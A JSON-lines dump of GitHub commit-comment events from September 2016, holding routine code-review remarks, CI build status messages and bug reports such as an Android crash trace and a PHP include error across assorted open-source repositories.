{"id":"4534909510","type":"CommitCommentEvent","actor":{"login":"fafcrumb"},"repo":{"name":"unicef/etools-partnership-management"},"payload":{"comment":{"id":18947244,"position":22,"line":31,"path":"index.html","commit_id":"45c2536ee28aba3834f776319327ecec900ca12c","created_at":"2016-09-08T15:48:13Z","updated_at":"2016-09-08T15:48:13Z","body":"Why the icon import here? Isn't this handled in manifest.json?"}},"created_at":"2016-09-08T15:48:13Z"}
{"id":"4534912092","type":"CommitCommentEvent","actor":{"login":"EgbertRijke"},"repo":{"name":"cmu-phil/Spectral"},"payload":{"comment":{"id":18947256,"position":74,"line":94,"path":"algebra/group_constructions.hlean","commit_id":"9f4436d5053c2a19a0692afd1bb565e411a56293","created_at":"2016-09-08T15:48:36Z","updated_at":"2016-09-08T15:48:36Z","body":"I also like this, @fpvandoorn. Can we also do this for subgroups: make a predicate `is_subgroup` for `R : G -> Prop`, which states that `R` is a subgroup. It would be useful, for instance, to show that for any set `X` the set of automorphisms on `X` is a group, and then to show that for any group `G`, the set of group automorphisms is a subgroup of the group of all automorphisms on the underlying set of `G`."}},"created_at":"2016-09-08T15:48:36Z"}
{"id":"4534913410","type":"CommitCommentEvent","actor":{"login":"paularmstrong"},"repo":{"name":"paularmstrong/swig"},"payload":{"comment":{"id":18947259,"position":null,"line":null,"path":null,"commit_id":"70a1c8899266893ff22354c2426329e306c2f322","created_at":"2016-09-08T15:48:49Z","updated_at":"2016-09-08T15:48:49Z","body":"There was an attempt to fork and keep a maintained build going, but they seem to have also given up due to lack of interest and not enough PRs. https://github.com/node-swig/swig-templates\r\n\r\nYou can build the docs yourself using `make docs`"}},"created_at":"2016-09-08T15:48:49Z"}
{"id":"4534914328","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-ide-eclipse"},"payload":{"comment":{"id":18947262,"position":59,"line":183,"path":"plugins/com.redhat.ceylon.eclipse.ui/source/com/redhat/ceylon/eclipse/core/launch/CeylonAwareLaunchConfiguration.ceylon","commit_id":"705c39801a8ed43a46c19101c51391b4f42fa4b8","created_at":"2016-09-08T15:48:58Z","updated_at":"2016-09-08T15:48:58Z","body":"@davidfestal why did you not just use `createJavaObjectArray()` here??"}},"created_at":"2016-09-08T15:48:58Z"}
{"id":"4534916966","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18947268,"position":null,"line":null,"path":null,"commit_id":"67422896564f96bc33c007d782639e86988f2131","created_at":"2016-09-08T15:49:24Z","updated_at":"2016-09-08T15:49:24Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-67422896564f96bc33c007d782639e86988f2131-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-67422896564f96bc33c007d782639e86988f2131-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T15:49:24Z"}
{"id":"4534917378","type":"CommitCommentEvent","actor":{"login":"davidfestal"},"repo":{"name":"ceylon/ceylon-ide-eclipse"},"payload":{"comment":{"id":18947269,"position":13,"line":55,"path":"plugins/com.redhat.ceylon.eclipse.ui/src/com/redhat/ceylon/eclipse/util/CeylonHelper.java","commit_id":"705c39801a8ed43a46c19101c51391b4f42fa4b8","created_at":"2016-09-08T15:49:28Z","updated_at":"2016-09-08T15:49:28Z","body":"I told you on gitter. And it's only there in `ceylon-ide-eclipse` to be used *in Java code*"}},"created_at":"2016-09-08T15:49:28Z"}
{"id":"4534917545","type":"CommitCommentEvent","actor":{"login":"GusCaplan"},"repo":{"name":"GusCaplan/googlebot"},"payload":{"comment":{"id":18947270,"position":11,"line":11,"path":"commands/botlist.js","commit_id":"bf5734d58050de1010c09770b7a357e740b46a7a","created_at":"2016-09-08T15:49:29Z","updated_at":"2016-09-08T15:49:29Z","body":"i realise i could have added this to the map below, but that would be messy"}},"created_at":"2016-09-08T15:49:29Z"}
{"id":"4534920922","type":"CommitCommentEvent","actor":{"login":"hvlad"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18947278,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T15:50:00Z","updated_at":"2016-09-08T15:50:00Z","body":"We could use function-style syntax for new internal_info nodes: EXCEPTION(), ERROR_MESSAGE()"}},"created_at":"2016-09-08T15:50:00Z"}
{"id":"4534921784","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":18947282,"position":21,"line":21,"path":"api/src/main/java/org/openmrs/CohortMember.java","commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-08T15:50:09Z","updated_at":"2016-09-08T15:50:09Z","body":"I think we switched to loggers being **protected final**"}},"created_at":"2016-09-08T15:50:09Z"}
{"id":"4534923541","type":"CommitCommentEvent","actor":{"login":"donnchawp"},"repo":{"name":"Automattic/WP-Job-Manager"},"payload":{"comment":{"id":18947285,"position":null,"line":null,"path":null,"commit_id":"7bdbe463832d67d99e20bcc17e85a28f7e8c119d","created_at":"2016-09-08T15:50:25Z","updated_at":"2016-09-08T15:50:25Z","body":"Disregard, I deleted this branch as it had a previous code change too."}},"created_at":"2016-09-08T15:50:25Z"}
{"id":"4534925488","type":"CommitCommentEvent","actor":{"login":"hvlad"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18947293,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T15:50:43Z","updated_at":"2016-09-08T15:50:43Z","body":"Alex,\r\n> Vlad, now I'm afraid to look stupid but I have no idea how to pass that information to grammar parser generated by btyacc.\r\n\r\nSo far i feel same ;)"}},"created_at":"2016-09-08T15:50:43Z"}
{"id":"4534926358","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18947295,"position":20,"line":71,"path":"test/components/urlBarSuggestionsTest.js","commit_id":"7edc0ce9c9079c9b8f165fa0a6add38abc827de8","created_at":"2016-09-08T15:50:49Z","updated_at":"2016-09-08T15:50:49Z","body":"this 'Down arrow' may actually be ok, but I didn't go back to test it after changing `Page 1` to `Page`"}},"created_at":"2016-09-08T15:50:49Z"}
{"id":"4534928085","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":18947305,"position":15,"line":15,"path":"api/src/main/java/org/openmrs/api/CohortMemberService.java","commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-08T15:51:05Z","updated_at":"2016-09-08T15:51:05Z","body":"I don't think you need a new service, use the existing CohortService"}},"created_at":"2016-09-08T15:51:05Z"}
{"id":"4534929081","type":"CommitCommentEvent","actor":{"login":"BatedUrGonnaDie"},"repo":{"name":"BatedUrGonnaDie/Autosplitters"},"payload":{"comment":{"id":18947308,"position":20,"line":18,"path":"Refunct/Refunct.asl","commit_id":"28d2c5d8691fa6c897f9e7aafc824a4050964646","created_at":"2016-09-08T15:51:14Z","updated_at":"2016-09-08T15:51:14Z","body":"Would it also be possible to get a static address for the button count/stage transition count?  Seems the pointer paths are giving different issues to different people."}},"created_at":"2016-09-08T15:51:14Z"}
{"id":"4534931194","type":"CommitCommentEvent","actor":{"login":"davidfestal"},"repo":{"name":"ceylon/ceylon-ide-eclipse"},"payload":{"comment":{"id":18947315,"position":59,"line":183,"path":"plugins/com.redhat.ceylon.eclipse.ui/source/com/redhat/ceylon/eclipse/core/launch/CeylonAwareLaunchConfiguration.ceylon","commit_id":"705c39801a8ed43a46c19101c51391b4f42fa4b8","created_at":"2016-09-08T15:51:29Z","updated_at":"2016-09-08T15:51:29Z","body":"I just fixed the compilation error with a broken IDE (because of the bumped version) :-( So I didn't try to further enhance the existing code. But sure it can be done. "}},"created_at":"2016-09-08T15:51:29Z"}
{"id":"4534932760","type":"CommitCommentEvent","actor":{"login":"fafcrumb"},"repo":{"name":"unicef/etools-partnership-management"},"payload":{"comment":{"id":18947319,"position":37,"line":40,"path":"index.html","commit_id":"45c2536ee28aba3834f776319327ecec900ca12c","created_at":"2016-09-08T15:51:43Z","updated_at":"2016-09-08T15:51:43Z","body":"I think it'd be a good idea to keep the imports and images here, and then replace the images later (once we have etools ones that are properly sized). I think we might be missing icons in some situations without these here."}},"created_at":"2016-09-08T15:51:43Z"}
{"id":"4534933691","type":"CommitCommentEvent","actor":{"login":"Esteban912"},"repo":{"name":"jlamyi/wiki_prac"},"payload":{"comment":{"id":18947321,"position":null,"line":null,"path":null,"commit_id":"7c2fa07b8de8ec9a8c88ca057a33280d9b7a09dc","created_at":"2016-09-08T15:51:50Z","updated_at":"2016-09-08T15:51:50Z","body":"如果我更改logo，是不是要上传图片到pmwiki然后在更改代码？"}},"created_at":"2016-09-08T15:51:50Z"}
{"id":"4534935177","type":"CommitCommentEvent","actor":{"login":"jwilsjustin"},"repo":{"name":"ammoready/gun_broker"},"payload":{"comment":{"id":18947325,"position":null,"line":null,"path":null,"commit_id":"c70a5c1ba809231dc5f33fa38dc2f3e80ed781cf","created_at":"2016-09-08T15:52:03Z","updated_at":"2016-09-08T15:52:03Z","body":"The `SellingStatus` parameter is a little bit of a confusing name. I believe this parameter was referring to whether and item was \"selling\" (as in it will sell) or \"not selling\" (as in it currently will not sell because it has no bids or the reserve has not been met).\r\n\r\nSo setting the `SellingStatus` to 1 (Selling) was returning nothing if all the items are not auctions."}},"created_at":"2016-09-08T15:52:03Z"}
{"id":"4534936867","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":18947332,"position":null,"line":null,"path":null,"commit_id":"d475f2bf8839ccbb75f187127965b976a88563e9","created_at":"2016-09-08T15:52:19Z","updated_at":"2016-09-08T15:52:19Z","body":"TeamCity Chorus :: chorus-win32-master Continuous [Build 2.6.263.d475f2bf8839ccbb75f187127965b976a88563e9](http://build.palaso.org/viewLog.html?buildId=76623&buildTypeId=bt2) outcome was **SUCCESS**\nSummary: Tests passed: 949, ignored: 50 Build time: 00:27:30"}},"created_at":"2016-09-08T15:52:19Z"}
{"id":"4534937790","type":"CommitCommentEvent","actor":{"login":"pillehu"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18947336,"position":null,"line":null,"path":null,"commit_id":"1dcfaa8b6acc5380208359fb02ffac843fd4289d","created_at":"2016-09-08T15:52:27Z","updated_at":"2016-09-08T15:52:27Z","body":"PHP Fatal error:  require_once(): Failed opening required '../../themes/FusionTheme/ThemePack//Theme.php'\r\n\r\nCode:\r\n$path = THEME.\"ThemePack/\".$themePack.\"/Theme.php\";\r\n...\r\nrequire_once $path;\r\n\r\n"}},"created_at":"2016-09-08T15:52:27Z"}
{"id":"4534938066","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18947338,"position":null,"line":null,"path":null,"commit_id":"9ded3d102588c977142e00842b1232ce06ca6aa8","created_at":"2016-09-08T15:52:30Z","updated_at":"2016-09-08T15:52:30Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.763.9ded3d102588c977142e00842b1232ce06ca6aa8](http://build.palaso.org/viewLog.html?buildId=76638&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:05:21"}},"created_at":"2016-09-08T15:52:30Z"}
{"id":"4534939426","type":"CommitCommentEvent","actor":{"login":"dpb587-pivotal"},"repo":{"name":"cloudfoundry/bosh"},"payload":{"comment":{"id":18947344,"position":9,"line":21,"path":"bosh-director/lib/bosh/director/deployment_plan/assembler.rb","commit_id":"2bdc45573b489fd3a12e2a34c16115934ef53b71","created_at":"2016-09-08T15:52:42Z","updated_at":"2016-09-08T15:52:42Z","body":"Maybe just call it `bind_links`/`bind_properties`? It seems like it's either doing it or not doing it, and no \"should\" about it. Maybe?"}},"created_at":"2016-09-08T15:52:42Z"}
{"id":"4534944865","type":"CommitCommentEvent","actor":{"login":"zheung"},"repo":{"name":"zheung/KairiQuery"},"payload":{"comment":{"id":18947355,"position":null,"line":null,"path":null,"commit_id":"c0d24a5ebd1bf5d36f096cf653108a49b8e97457","created_at":"2016-09-08T15:53:28Z","updated_at":"2016-09-08T15:53:28Z","body":"fixed #2 "}},"created_at":"2016-09-08T15:53:28Z"}
{"id":"4534945634","type":"CommitCommentEvent","actor":{"login":"simkieu"},"repo":{"name":"simkieu/cs2340"},"payload":{"comment":{"id":18947357,"position":null,"line":null,"path":null,"commit_id":"8bcb0acf7cf9bb4a2a6e7034373fc205f0a161f5","created_at":"2016-09-08T15:53:35Z","updated_at":"2016-09-08T15:53:35Z","body":"Good job!"}},"created_at":"2016-09-08T15:53:35Z"}
{"id":"4534950024","type":"CommitCommentEvent","actor":{"login":"gr2m"},"repo":{"name":"Rookies-RGSOC2016/Riot.js-Learning"},"payload":{"comment":{"id":18947364,"position":29,"line":40,"path":"tags/apps-container.tag","commit_id":"fc8a2e5541ebec4df8767d7969a41b45c0883ab5","created_at":"2016-09-08T15:54:15Z","updated_at":"2016-09-08T15:54:15Z","body":"$allList is referencing the `<ul>` element in the DOM, it’s not our API. \r\nThe API is is `applist` (all lower case), see https://github.com/Rookies-RGSOC2016/Riot.js-Learning/blob/fc8a2e5541ebec4df8767d7969a41b45c0883ab5/scripts/indexApi.js#L2"}},"created_at":"2016-09-08T15:54:15Z"}
{"id":"4534950770","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18947368,"position":20,"line":71,"path":"test/components/urlBarSuggestionsTest.js","commit_id":"7edc0ce9c9079c9b8f165fa0a6add38abc827de8","created_at":"2016-09-08T15:54:21Z","updated_at":"2016-09-08T15:54:21Z","body":"I think we should just have some constants for it in any case to make the code readable. "}},"created_at":"2016-09-08T15:54:21Z"}
{"id":"4534952575","type":"CommitCommentEvent","actor":{"login":"gorhill"},"repo":{"name":"gorhill/uBO-WebSocket"},"payload":{"comment":{"id":18947370,"position":97,"line":97,"path":"contentscript.js","commit_id":"a4c85f0ae004e332e932b6d6452e3fa75fc6f7f8","created_at":"2016-09-08T15:54:37Z","updated_at":"2016-09-08T15:54:37Z","body":"> function object is autoconverted to a string\r\n\r\nThat's how I do it in the prototype code at dev time. Once the code is stable, there is no point incurring the overhead of having the javascript engine parse and compile that code just for the sake of generating the string, that code will never be used in the context of the content script, only in the context of the page."}},"created_at":"2016-09-08T15:54:37Z"}
{"id":"4534953964","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18947374,"position":null,"line":null,"path":null,"commit_id":"67422896564f96bc33c007d782639e86988f2131","created_at":"2016-09-08T15:54:49Z","updated_at":"2016-09-08T15:54:49Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-67422896564f96bc33c007d782639e86988f2131-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-08T15:54:49Z"}
{"id":"4534959452","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18947387,"position":20,"line":71,"path":"test/components/urlBarSuggestionsTest.js","commit_id":"7edc0ce9c9079c9b8f165fa0a6add38abc827de8","created_at":"2016-09-08T15:55:38Z","updated_at":"2016-09-08T15:55:38Z","body":"I was thinking about pulling this in https://github.com/hadynz/unicode-keymap\r\nhttps://github.com/hadynz/unicode-keymap/blob/master/lib/unicode-keymap.js"}},"created_at":"2016-09-08T15:55:38Z"}
{"id":"4534959432","type":"CommitCommentEvent","actor":{"login":"jbonachera"},"repo":{"name":"Horgix/elsa"},"payload":{"comment":{"id":18947388,"position":null,"line":null,"path":null,"commit_id":"cf6d8640526792a7e70977bccc92e8e3e3ddfdcd","created_at":"2016-09-08T15:55:39Z","updated_at":"2016-09-08T15:55:39Z","body":"👍 "}},"created_at":"2016-09-08T15:55:39Z"}
{"id":"4534960778","type":"CommitCommentEvent","actor":{"login":"inquilinus"},"repo":{"name":"inquilinus/Mobox-test-task"},"payload":{"comment":{"id":18947392,"position":null,"line":null,"path":null,"commit_id":"7acb06150ddd69319ee687d563ccb49d34d73036","created_at":"2016-09-08T15:55:51Z","updated_at":"2016-09-08T15:55:51Z","body":"add logs from logCat\r\n\r\nif needed copy-paste to text nottepad or similar.\r\n\r\n\r\n09-08 11:51:58.352 5952-6181/com.worlddomination.mushroom.mobox_test_task I/OpenGLRenderer: Initialized EGL, version 1.4\r\n09-08 11:51:58.414 5952-6181/com.worlddomination.mushroom.mobox_test_task W/EGL_emulation: eglSurfaceAttrib not implemented\r\n09-08 11:51:58.414 5952-6181/com.worlddomination.mushroom.mobox_test_task W/OpenGLRenderer: Failed to set EGL_SWAP_BEHAVIOR on surface 0xeea53560, error=EGL_SUCCESS\r\n09-08 11:51:58.568 5952-5952/com.worlddomination.mushroom.mobox_test_task E/RecyclerView: No adapter attached; skipping layout\r\n09-08 11:51:58.594 5952-5952/com.worlddomination.mushroom.mobox_test_task E/RecyclerView: No adapter attached; skipping layout\r\n09-08 11:51:58.787 5952-5952/com.worlddomination.mushroom.mobox_test_task W/ResourceType: No package identifier when getting value for resource number 0x0000001c\r\n09-08 11:51:58.787 5952-5952/com.worlddomination.mushroom.mobox_test_task D/AndroidRuntime: Shutting down VM\r\n09-08 11:51:58.787 5952-5952/com.worlddomination.mushroom.mobox_test_task E/AndroidRuntime: FATAL EXCEPTION: main\r\n                                                                                            Process: com.worlddomination.mushroom.mobox_test_task, PID: 5952\r\n                                                                                            android.content.res.Resources$NotFoundException: String resource ID #0x1c\r\n                                                                                                at android.content.res.Resources.getText(Resources.java:312)\r\n                                                                                                at android.support.v7.widget.ResourcesWrapper.getText(ResourcesWrapper.java:52)\r\n                                                                                                at android.widget.TextView.setText(TextView.java:4417)\r\n                                                                                                at com.worlddomination.mushroom.mobox_test_task.databinding.MovieItemListBinding.executeBindings(MovieItemListBinding.java:129)\r\n                                                                                                at android.databinding.ViewDataBinding.executePendingBindings(ViewDataBinding.java:355)\r\n                                                                                                at android.databinding.ViewDataBinding$6.run(ViewDataBinding.java:172)\r\n                                                                                                at android.databinding.ViewDataBinding$7.doFrame(ViewDataBinding.java:238)\r\n                                                                                                at android.view.Choreographer$CallbackRecord.run(Choreographer.java:856)\r\n                                                                                                at android.view.Choreographer.doCallbacks(Choreographer.java:670)\r\n                                                                                                at android.view.Choreographer.doFrame(Choreographer.java:603)\r\n                                                                                                at android.view.Choreographer$FrameDisplayEventReceiver.run(Choreographer.java:844)\r\n                                                                                                at android.os.Handler.handleCallback(Handler.java:739)\r\n                                                                                                at android.os.Handler.dispatchMessage(Handler.java:95)\r\n                                                                                                at android.os.Looper.loop(Looper.java:148)\r\n                                                                                                at android.app.ActivityThread.main(ActivityThread.java:5417)\r\n                                                                                                at java.lang.reflect.Method.invoke(Native Method)\r\n                                                                                                at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:726)\r\n                                                                                                at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616)\r\n"}},"created_at":"2016-09-08T15:55:51Z"}
{"id":"4534961818","type":"CommitCommentEvent","actor":{"login":"peter-mouland"},"repo":{"name":"RichMatthews/firebase_webapp"},"payload":{"comment":{"id":18947397,"position":5,"line":2,"path":"js/index.js","commit_id":"144d4fd599e2f981b618e8d26a9b786a2bc943e8","created_at":"2016-09-08T15:56:01Z","updated_at":"2016-09-08T15:56:01Z","body":"This file should be in /server as it's a server only file"}},"created_at":"2016-09-08T15:56:01Z"}
{"id":"4534963393","type":"CommitCommentEvent","actor":{"login":"awasser1"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":18947405,"position":null,"line":null,"path":null,"commit_id":"0814f63615615f966f1c2c92732658b3a726ad1b","created_at":"2016-09-08T15:56:16Z","updated_at":"2016-09-08T15:56:16Z","body":"i wish when these occur the author would put a short comment what these things do.  its all in code and to most of us it means very little..."}},"created_at":"2016-09-08T15:56:16Z"}
{"id":"4534965889","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18947411,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T15:56:38Z","updated_at":"2016-09-08T15:56:38Z","body":"There is no problem with AOSP, but CM, it throws errors when generate ninja build file so I have to disable it. By the way, did you have any problems when building CM? With me, the build progress get stuck at generating ```file_contexts.bin``` step with a ```m4``` process is hanging and do nothing."}},"created_at":"2016-09-08T15:56:38Z"}
{"id":"4534966603","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":18947415,"position":29,"line":29,"path":"api/src/main/resources/org/openmrs/api/db/hibernate/CohortMember.hbm.xml","commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-08T15:56:45Z","updated_at":"2016-09-08T15:56:45Z","body":"Don't you need to add a creator field?"}},"created_at":"2016-09-08T15:56:45Z"}
{"id":"4534968049","type":"CommitCommentEvent","actor":{"login":"nricci"},"repo":{"name":"nmaguirre/minesweeper"},"payload":{"comment":{"id":18947418,"position":null,"line":null,"path":null,"commit_id":"42787f96cfe1b7d88d1f1b280ef67926716f0e38","created_at":"2016-09-08T15:56:59Z","updated_at":"2016-09-08T15:56:59Z","body":"@LuuchoRocha: very good you fixed the compilation problem. Merge this into the master branch ASAP! "}},"created_at":"2016-09-08T15:56:59Z"}
{"id":"4534968553","type":"CommitCommentEvent","actor":{"login":"araykopotay"},"repo":{"name":"rintaro/Net-IP-AddrRanges"},"payload":{"comment":{"id":18947420,"position":20,"line":28,"path":"README","commit_id":"68547d9dd887851f4be70f7fd2bda09defef3f9f","created_at":"2016-09-08T15:57:04Z","updated_at":"2016-09-08T15:57:04Z","body":"+"}},"created_at":"2016-09-08T15:57:04Z"}
{"id":"4534969616","type":"CommitCommentEvent","actor":{"login":"araykopotay"},"repo":{"name":"rintaro/Net-IP-AddrRanges"},"payload":{"comment":{"id":18947426,"position":30,"line":36,"path":"README","commit_id":"68547d9dd887851f4be70f7fd2bda09defef3f9f","created_at":"2016-09-08T15:57:15Z","updated_at":"2016-09-08T15:57:15Z","body":"+"}},"created_at":"2016-09-08T15:57:15Z"}
{"id":"4534971230","type":"CommitCommentEvent","actor":{"login":"fafcrumb"},"repo":{"name":"unicef/etools-partnership-management"},"payload":{"comment":{"id":18947429,"position":48,"line":93,"path":"index.html","commit_id":"45c2536ee28aba3834f776319327ecec900ca12c","created_at":"2016-09-08T15:57:30Z","updated_at":"2016-09-08T15:57:30Z","body":"Gonna move the theme import to my-app.html. Want to minimize imports in the head of index.html for faster first paint of the page"}},"created_at":"2016-09-08T15:57:30Z"}
{"id":"4534972884","type":"CommitCommentEvent","actor":{"login":"peter-mouland"},"repo":{"name":"RichMatthews/firebase_webapp"},"payload":{"comment":{"id":18947434,"position":16,"line":16,"path":"webpack.config.js","commit_id":"144d4fd599e2f981b618e8d26a9b786a2bc943e8","created_at":"2016-09-08T15:57:45Z","updated_at":"2016-09-08T15:57:45Z","body":"The exclude shouldn't make a difference here,  I'd leave it out.  It would only matter if you tried to require in a json file from with node_modules"}},"created_at":"2016-09-08T15:57:45Z"}
{"id":"4534973749","type":"CommitCommentEvent","actor":{"login":"Tricky1975"},"repo":{"name":"Tricky1975/TrickyMod"},"payload":{"comment":{"id":18947435,"position":null,"line":null,"path":null,"commit_id":"e5248b4abe8f5642c9d37ad0f09f5d09c5235086","created_at":"2016-09-08T15:57:53Z","updated_at":"2016-09-08T15:57:53Z","body":"Needed for phantasarproductions/tftrevamp#39"}},"created_at":"2016-09-08T15:57:53Z"}
{"id":"4534979036","type":"CommitCommentEvent","actor":{"login":"peter-mouland"},"repo":{"name":"RichMatthews/firebase_webapp"},"payload":{"comment":{"id":18947444,"position":7,"line":6,"path":"webpack.config.js","commit_id":"144d4fd599e2f981b618e8d26a9b786a2bc943e8","created_at":"2016-09-08T15:58:43Z","updated_at":"2016-09-08T15:58:43Z","body":"Shouldn't need these as these are for trying to get server side code working in the browser, and your app doesn't need the server code in the vrowser"}},"created_at":"2016-09-08T15:58:43Z"}
{"id":"4534980323","type":"CommitCommentEvent","actor":{"login":"lucaswerkmeister"},"repo":{"name":"ceylon/ceylon.ast"},"payload":{"comment":{"id":18947447,"position":null,"line":null,"path":null,"commit_id":"21ca57376fff6d4e06a3ffc85d6b3d52da44faf3","created_at":"2016-09-08T15:58:55Z","updated_at":"2016-09-08T15:58:55Z","body":"Oh right, I forgot about that. And annotation, import, uppercase identifiers too. Thanks!"}},"created_at":"2016-09-08T15:58:55Z"}
{"id":"4534980827","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18947448,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T15:58:59Z","updated_at":"2016-09-08T15:58:59Z","body":"This is great! Could you change 'Warn:... using latest' to 'Note: No/Invalid deliverable specified....'? Also, just so we can experiment can we look at sending the test name of the first failing test back after the N passing, M failing message?"}},"created_at":"2016-09-08T15:58:59Z"}
{"id":"4534981215","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18947450,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T15:59:03Z","updated_at":"2016-09-08T15:59:03Z","body":"well we have been getting out of memory error from java (jack) in @Lehkeda's pc\r\nAnd yeah, we didnt get any error with ninja, and we havent reached until file_contexts"}},"created_at":"2016-09-08T15:59:03Z"}
{"id":"4534982095","type":"CommitCommentEvent","actor":{"login":"Megamezzomixer"},"repo":{"name":"Megamezzomixer/interactivecplusplus"},"payload":{"comment":{"id":18947457,"position":3,"line":3,"path":"mainwindow.cpp","commit_id":"03990d09eec11f2ca9b815eb4db1d1282bd9ff4a","created_at":"2016-09-08T15:59:12Z","updated_at":"2016-09-08T15:59:12Z","body":"Ist das include nicht nötig?"}},"created_at":"2016-09-08T15:59:12Z"}
{"id":"4534983399","type":"CommitCommentEvent","actor":{"login":"peter-mouland"},"repo":{"name":"RichMatthews/firebase_webapp"},"payload":{"comment":{"id":18947459,"position":3,"line":3,"path":"webpack.config.js","commit_id":"144d4fd599e2f981b618e8d26a9b786a2bc943e8","created_at":"2016-09-08T15:59:25Z","updated_at":"2016-09-08T15:59:25Z","body":"This is the problem!\r\nBecause the index in /js is currently the server index (see previous comment about saying it's in the wrong folder!)"}},"created_at":"2016-09-08T15:59:25Z"}
{"id":"4534983677","type":"CommitCommentEvent","actor":{"login":"gdamore"},"repo":{"name":"gdamore/nanomsg"},"payload":{"comment":{"id":18947461,"position":5,"line":43,"path":"CMakeLists.txt","commit_id":"aa5c94cae9ebc39e2efd0ee266899a96792ff633","created_at":"2016-09-08T15:59:28Z","updated_at":"2016-09-08T15:59:28Z","body":"Good point!!\n\nSent from my iPhone\n\n> On Sep 8, 2016, at 7:26 AM, Franklin Mathieu <notifications@github.com> wrote:\n> \n> lib should probably be ${CMAKE_INSTALL_LIBDIR} as some 64-bit platforms use the lib64 (or lib32) directory.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-08T15:59:28Z"}
{"id":"4534983776","type":"CommitCommentEvent","actor":{"login":"inquilinus"},"repo":{"name":"inquilinus/Mobox-test-task"},"payload":{"comment":{"id":18947462,"position":null,"line":null,"path":null,"commit_id":"7a5618894ba0071a06626a035e14e53b28cb1b70","created_at":"2016-09-08T15:59:29Z","updated_at":"2016-09-08T15:59:29Z","body":"Also Added finterfaces for drug/drop &swipe items in recyclearViev. Based on Paul Burke https://medium.com/@ipaulpro/drag-and-swipe-with-recyclerview-6a6f0c422efd#.3ofennuht"}},"created_at":"2016-09-08T15:59:29Z"}
{"id":"4534984110","type":"CommitCommentEvent","actor":{"login":"fafcrumb"},"repo":{"name":"unicef/etools-partnership-management"},"payload":{"comment":{"id":18947464,"position":4,"line":4,"path":"manifest.json","commit_id":"45c2536ee28aba3834f776319327ecec900ca12c","created_at":"2016-09-08T15:59:32Z","updated_at":"2016-09-08T15:59:32Z","body":"reason for removing this? this might be important for starting the web-app form the homescreen"}},"created_at":"2016-09-08T15:59:32Z"}
